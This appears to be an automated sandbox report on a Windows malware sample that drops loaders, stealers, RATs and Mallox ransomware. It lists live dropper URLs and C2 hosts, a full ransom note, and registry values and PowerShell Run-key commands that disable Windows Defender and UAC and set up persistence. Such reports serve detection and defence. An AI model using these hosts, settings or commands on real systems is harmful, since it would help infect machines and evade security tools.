amadey | 69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31

Resubmissions

01-06-2024 17:26

240601-v1b7saad53 10

01-06-2024 17:08

01-06-2024 16:56

01-06-2024 16:43

01-06-2024 15:54

Analysis

max time kernel
137s
max time network
501s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
01-06-2024 16:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.exe
Size

4KB
MD5

a239a27c2169af388d4f5be6b52f272c
SHA1

0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
SHA256

98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
SHA512

f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
SSDEEP

48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://94.103.188.126/jerry/putty.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://49.13.194.118/ADServices.exe

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

Fresh

pepecasas123.net:4608

Mutex

AsyncMutex_5952

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Path

\Device\HarddiskVolume1\HOW TO BACK FILES.txt

Ransom Note

Hello Your data has been stolen and encrypted We will delete the stolen data and help with the recovery of encrypted files after payment has been made Do not try to change or restore files yourself, this will break them We provide free decryption for any 3 files up to 3MB in size on our website How to contact with us: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 666F52836F922D29A0B5502F 5) You will see chat, payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion �

URLs

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion

Extracted

Family

risepro

118.194.235.187:50500

Extracted

Family

amadey

Version

4.21

Botnet

49e482

http://147.45.47.70

Attributes

install_dir
1b29d73536
install_file
axplont.exe
strings_key
4d31dd1a190d9879c21fac6d87dc0043
url_paths
/tr8nomy/index.php

rc4.plain

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

185.172.128.33:8970

Extracted

Family

redline

Botnet

185.215.113.67:40960

Extracted

Family

lumma

https://fragmentyperspowp.shop/api

https://horsedwollfedrwos.shop/api

https://patternapplauderw.shop/api

https://understanndtytonyguw.shop/api

https://considerrycurrentyws.shop/api

https://messtimetabledkolvk.shop/api

https://detailbaconroollyws.shop/api

https://deprivedrinkyfaiir.shop/api

https://relaxtionflouwerwi.shop/api

https://roomabolishsnifftwk.shop/api

https://museumtespaceorsp.shop/api

https://buttockdecarderwiso.shop/api

https://averageaattractiionsl.shop/api

https://femininiespywageg.shop/api

https://employhabragaomlsp.shop/api

https://stalfbaclcalorieeis.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\svhost.exe	family_xworm

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

RegAsm.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	RegAsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	RegAsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	RegAsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	RegAsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	RegAsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	RegAsm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	RegAsm.exe

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

xRIa2pgMqR8CyIct629duTuA.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	xRIa2pgMqR8CyIct629duTuA.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/7980-20638-0x0000000002D20000-0x0000000002D90000-memory.dmp	family_redline
behavioral2/memory/7980-20724-0x0000000005390000-0x00000000053FE000-memory.dmp	family_redline
behavioral2/memory/4412-28184-0x00000000009B0000-0x0000000000A02000-memory.dmp	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\a\fileosn.exe	family_redline
behavioral2/memory/7300-28457-0x0000000000840000-0x0000000000892000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
TargetCompany,Mallox
TargetCompany (aka Mallox) is a ransomware which encrypts files using a combination of ChaCha20, AES-128, and Curve25519, first seen in June 2021.
ransomware targetcompany

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

New.exeBhkHOtQUzYlmmW5DIU7AxqxG.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	New.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	BhkHOtQUzYlmmW5DIU7AxqxG.exe

Windows security bypass 2 TTPs 4 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

BhkHOtQUzYlmmW5DIU7AxqxG.exexRIa2pgMqR8CyIct629duTuA.exeNew.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\BhkHOtQUzYlmmW5DIU7AxqxG.exe = "0"	BhkHOtQUzYlmmW5DIU7AxqxG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	xRIa2pgMqR8CyIct629duTuA.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	New.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\a\New.exe = "0"	New.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

random.exelenin.exeaxplont.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	lenin.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

6404 bcdedit.exe
6456 bcdedit.exe
Renames multiple (3541) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

pid	process
6404	bcdedit.exe
6456	bcdedit.exe

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exeinte.exeRegAsm.exe

flow	pid	process
64	3784	powershell.exe
232	7060	inte.exe
238	7060	inte.exe
265	2764	RegAsm.exe
275	2764	RegAsm.exe
282	2764	RegAsm.exe
285	2764	RegAsm.exe
295	2764	RegAsm.exe
300	2764	RegAsm.exe
307	2764	RegAsm.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 31 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5708	powershell.exe
5004	powershell.exe
9164	powershell.exe
6500	powershell.exe
5436	powershell.exe
5596	powershell.exe
5604	powershell.exe
9992	powershell.exe
10092	powershell.exe
2400	powershell.exe
7704	powershell.exe
7204	powershell.exe
5020	powershell.exe
6728	powershell.exe
336	powershell.exe
7532	powershell.exe
7060	powershell.exe
10052	powershell.exe
7704	powershell.exe
2428	powershell.exe
4976	powershell.EXE
6976	powershell.exe
5920	powershell.exe
5616	powershell.exe
8096	powershell.exe
4436	powershell.exe
4836	powershell.exe
8548	powershell.exe
7644	powershell.exe
7704	powershell.exe
3784	powershell.exe

Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

9088 netsh.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

548 takeown.exe
9488 icacls.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
9088	netsh.exe

pid	process
548	takeown.exe
9488	icacls.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral2/memory/7980-20638-0x0000000002D20000-0x0000000002D90000-memory.dmp	net_reactor
behavioral2/memory/7980-20724-0x0000000005390000-0x00000000053FE000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

axplont.exerandom.exelenin.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	lenin.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	lenin.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe

Checks computer location settings 2 TTPs 13 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

New.exewinlogon.exerandom.exeNew Text Document.exeld.exeInstall.exeGTA_V.tmpRegAsm.exe21bBOAJQnvGVbwFfAGEPwDKW.exeADServices.exe360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe360TS_Setup.exeBhkHOtQUzYlmmW5DIU7AxqxG.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	New.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	winlogon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	New Text Document.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	ld.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	GTA_V.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	21bBOAJQnvGVbwFfAGEPwDKW.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	ADServices.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	360TS_Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	BhkHOtQUzYlmmW5DIU7AxqxG.exe

Drops startup file 8 IoCs

Processes:

installutil.exesvchost.exeRegAsm.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WD7bGLnx0uQj8o0nvWYA1zIb.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3l1Gl1Yjcm8C3jGWBaW48EKW.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eTvoGKiVueS1Q9IhewMHS1w1.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E5LihA3hxRmyR7D9dJWll0tf.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E0lfvdtyqEH9CGXNH2JvFZ7I.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FANBooster2663.lnk	RegAsm.exe

Executes dropped EXE 47 IoCs

Processes:

volumeinfo.exeZinker.exesmartsoftsignew.exeADServices.exeNew.exe360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exeputty.exesvchost.exe360TS_Setup.exe360TS_Setup.exeGTA_V.exeCapSimple.exeGTA_V.tmpRambledMimets.exevolumeinfo.exeld.exe7z.exeMSiedge.exe7z.exe7z.exevictor.exeRambledMime.execurrent.exehost_so.exemixinte.exeinte.exewinlogon.exesetup.exefile300un.exeInstall.exeInstall.exebuildjudit.exestub.exelumma1234.exego.exerandom.exe33333.exelenin.exeBhkHOtQUzYlmmW5DIU7AxqxG.exeAPnJdRJVmzw2fPsQ5tTw8dbW.exeaxplont.exe21bBOAJQnvGVbwFfAGEPwDKW.exesvhoost.exeOne.exealex.exexRIa2pgMqR8CyIct629duTuA.exewell.exe

pid	process
4048	volumeinfo.exe
2256	Zinker.exe
3964	smartsoftsignew.exe
1564	ADServices.exe
2904	New.exe
3056	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
5096	putty.exe
1528	svchost.exe
6024	360TS_Setup.exe
5748	360TS_Setup.exe
820	GTA_V.exe
5564	CapSimple.exe
5956	GTA_V.tmp
5292	RambledMimets.exe
5644	volumeinfo.exe
440	ld.exe
4252	7z.exe
5780	MSiedge.exe
7124	7z.exe
3056	7z.exe
5948	victor.exe
7648	RambledMime.exe
7680	current.exe
7672	host_so.exe
6336	mixinte.exe
7060	inte.exe
7608	winlogon.exe
8552	setup.exe
4152	file300un.exe
6436	Install.exe
1868	Install.exe
7592	buildjudit.exe
7292	stub.exe
1944	lumma1234.exe
1940	go.exe
8636	random.exe
3176	33333.exe
3268	lenin.exe
8580	BhkHOtQUzYlmmW5DIU7AxqxG.exe
7364	APnJdRJVmzw2fPsQ5tTw8dbW.exe
8144	axplont.exe
7700	21bBOAJQnvGVbwFfAGEPwDKW.exe
4412	svhoost.exe
8748	One.exe
6860	alex.exe
5944	xRIa2pgMqR8CyIct629duTuA.exe
7436	well.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

random.exelenin.exeaxplont.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Wine	lenin.exe
Key opened	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Wine	axplont.exe

Loads dropped DLL 64 IoCs

Processes:

smartsoftsignew.exe360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe360TS_Setup.exe360TS_Setup.exeGTA_V.tmp7z.exe7z.exe7z.exestub.exe

pid	process
3964	smartsoftsignew.exe
3964	smartsoftsignew.exe
3056	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
6024	360TS_Setup.exe
5748	360TS_Setup.exe
5956	GTA_V.tmp
5956	GTA_V.tmp
4252	7z.exe
7124	7z.exe
3056	7z.exe
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
5956	GTA_V.tmp
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe
7292	stub.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

548 takeown.exe
9488 icacls.exe

pid	process
548	takeown.exe
9488	icacls.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\A.I.exe	upx

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\lordga.exe	vmprotect

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

New.exeRegAsm.exeBhkHOtQUzYlmmW5DIU7AxqxG.exexRIa2pgMqR8CyIct629duTuA.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	New.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\a\New.exe = "0"	New.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	RegAsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	RegAsm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\BhkHOtQUzYlmmW5DIU7AxqxG.exe = "0"	BhkHOtQUzYlmmW5DIU7AxqxG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	xRIa2pgMqR8CyIct629duTuA.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	New.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svchost.exevolumeinfo.exeRegAsm.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S} = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" ..."	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\volumeinfo.exe'\""	volumeinfo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaxLoonaFest2663 = "C:\\Users\\Admin\\AppData\\Local\\MaxLoonaFest2663\\MaxLoonaFest2663.exe"	RegAsm.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

New.exeBhkHOtQUzYlmmW5DIU7AxqxG.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	New.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	BhkHOtQUzYlmmW5DIU7AxqxG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	BhkHOtQUzYlmmW5DIU7AxqxG.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	New.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

ld.exe

description	ioc	process
File opened (read-only)	\??\E:	ld.exe
File opened (read-only)	\??\G:	ld.exe
File opened (read-only)	\??\S:	ld.exe
File opened (read-only)	\??\X:	ld.exe
File opened (read-only)	\??\Y:	ld.exe
File opened (read-only)	\??\D:	ld.exe
File opened (read-only)	\??\H:	ld.exe
File opened (read-only)	\??\I:	ld.exe
File opened (read-only)	\??\J:	ld.exe
File opened (read-only)	\??\M:	ld.exe
File opened (read-only)	\??\N:	ld.exe
File opened (read-only)	\??\Z:	ld.exe
File opened (read-only)	\??\O:	ld.exe
File opened (read-only)	\??\Q:	ld.exe
File opened (read-only)	\??\T:	ld.exe
File opened (read-only)	\??\V:	ld.exe
File opened (read-only)	\??\A:	ld.exe
File opened (read-only)	\??\B:	ld.exe
File opened (read-only)	\??\K:	ld.exe
File opened (read-only)	\??\L:	ld.exe
File opened (read-only)	\??\P:	ld.exe
File opened (read-only)	\??\R:	ld.exe
File opened (read-only)	\??\U:	ld.exe
File opened (read-only)	\??\W:	ld.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 30 IoCs

Web Service

T1102

Processes:

flow	ioc
531	pastebin.com
563	raw.githubusercontent.com
700	pastebin.com
264	pastebin.com
732	discord.com
734	discord.com
735	discord.com
102	iplogger.com
261	pastebin.com
594	raw.githubusercontent.com
733	discord.com
28	raw.githubusercontent.com
380	pastebin.com
509	raw.githubusercontent.com
562	raw.githubusercontent.com
508	raw.githubusercontent.com
505	raw.githubusercontent.com
589	raw.githubusercontent.com
730	discord.com
731	discord.com
29	raw.githubusercontent.com
105	iplogger.com
513	raw.githubusercontent.com
698	pastebin.com
529	pastebin.com
583	raw.githubusercontent.com
104	iplogger.com
503	raw.githubusercontent.com
504	raw.githubusercontent.com
507	raw.githubusercontent.com

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
571	ipinfo.io
183	api.ipify.org
463	ipinfo.io
464	ipinfo.io
473	ipinfo.io
496	ipinfo.io
498	ipinfo.io
570	ipinfo.io
674	ip-api.com
497	ipinfo.io
567	api.myip.com
568	api.myip.com

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

Processes:

360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe360TS_Setup.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
File opened for modification	\??\PhysicalDrive0	360TS_Setup.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\go.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\a\well.exe	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

random.exelenin.exeaxplont.exe

pid process

8636 random.exe
3268 lenin.exe
8144 axplont.exe

pid	process
8636	random.exe
3268	lenin.exe
8144	axplont.exe

Suspicious use of SetThreadContext 11 IoCs

Processes:

Zinker.exeNew.exevolumeinfo.exeCapSimple.exeRambledMimets.exeRambledMime.exeRegAsm.exefile300un.exelumma1234.exe33333.exealex.exe

description	pid	process	target process
PID 2256 set thread context of 3712	2256	Zinker.exe	RegAsm.exe
PID 2904 set thread context of 5168	2904	New.exe	CasPol.exe
PID 4048 set thread context of 5644	4048	volumeinfo.exe	volumeinfo.exe
PID 5564 set thread context of 6312	5564	CapSimple.exe	RegAsm.exe
PID 5292 set thread context of 6444	5292	RambledMimets.exe	RegAsm.exe
PID 7648 set thread context of 7336	7648	RambledMime.exe	RegAsm.exe
PID 7336 set thread context of 7980	7336	RegAsm.exe	RegAsm.exe
PID 4152 set thread context of 7228	4152	file300un.exe	installutil.exe
PID 1944 set thread context of 2764	1944	lumma1234.exe	powershell.exe
PID 3176 set thread context of 4356	3176	33333.exe	RegAsm.exe
PID 6860 set thread context of 5756	6860	alex.exe	RegAsm.exe

Drops file in Program Files directory 64 IoCs

Processes:

ld.exe

description	ioc	process
File created	C:\Program Files\Microsoft Office\root\Office16\SAMPLES\HOW TO BACK FILES.txt	ld.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-sl\HOW TO BACK FILES.txt	ld.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\HOW TO BACK FILES.txt	ld.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\HelpAndFeedback\VideoThumbnail.png	ld.exe
File created	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\stickers\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-pl.xrm-ms	ld.exe
File opened for modification	C:\Program Files\Windows Media Player\es-ES\WMPMediaSharing.dll.mui	ld.exe
